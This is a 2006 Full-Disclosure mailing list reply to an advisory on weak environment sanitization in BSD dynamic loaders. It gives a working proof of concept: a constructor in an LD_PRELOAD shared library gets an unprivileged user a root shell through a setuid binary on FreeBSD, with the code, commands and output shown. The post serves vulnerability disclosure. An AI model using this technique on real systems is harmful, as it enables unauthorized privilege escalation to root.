Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.

["Tyop?" <tyoptyop () gmail com>]

On 11/22/06, Tyop? <tyoptyop () gmail com> wrote:
> On 11/22/06, In Cognito <defend.the.world () gmail com> wrote:
> > Impact:  Serious. May lead to privilege escalation.
> >
> > A class of security vulnerabilities has resurfaced in the dynamic loaders
> > of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment
> > variables for suid and sgid binaries.
> >
> > Due to either badly implemented sanitization or a lack of it, a setuid
> > binary may execute other processes with a tainted environment.
> >
> > [...]
> >
> > Have fun! Stay safe!
>
>
> Fun. Not "perfectly" safe.
>
> My experience :
>
> %id
> uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
> %cat vuln.c
> main()
> {
>   setuid(0);
>   execl("/usr/bin/id","id",0);
> }
> %cc vuln.c -o vuln && chmod 4711 ./vuln
> %exit
>
> > id
> uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
> > ls -l vuln
> -rws--x--x  1 root  tyop  4827 Nov 22 22:46 vuln
> > cat tyop.c
> __attribute__ ((constructor)) main()
> {
>   printf("[+] Hello from shared library land\n");
>   execle("/bin/sh","sh",0,0);
> }
> > cc -shared -o lib.so tyop.c
> > setenv LD_PRELOAD "/home/tyop/test/lib.so"
> > ./vuln
> [+] Hello from shared library land
> # id
> uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
> # echo "It works on `uname -sr`"
> It works on FreeBSD 7.0-CURRENT-200609
> #
>
> Have a nice day.

# echo "It works with vuln static too"
It works with vuln static too.
(sry for double post)

-- 
Tyop?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/